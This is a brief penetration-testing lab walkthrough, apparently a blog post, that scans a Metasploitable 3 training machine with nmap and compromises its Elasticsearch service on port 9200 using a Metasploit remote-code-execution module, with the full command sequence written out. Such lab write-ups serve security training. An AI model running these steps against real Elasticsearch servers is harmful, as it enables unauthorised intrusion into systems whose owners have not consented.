Kali Linux, Penetration Testing

Hack Metasploitable 3 using Elasticsearch Exploit

Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.

nmap –p- -A 192.168.1.8

Nmap shows a splendid result and in that result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.

YES! We have an exploit for that. Let’s use it to our advantage.

To use this exploit go to Metasploit and type:

use exploit/multi/elasticsearch/script_mvel_rce

msf exploit (script_mvel_rce)>set rhost 192.168.1.8

msf exploit (script_mvel_rce)>set rport 9200

msf exploit (script_mvel_rce)>exploit

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.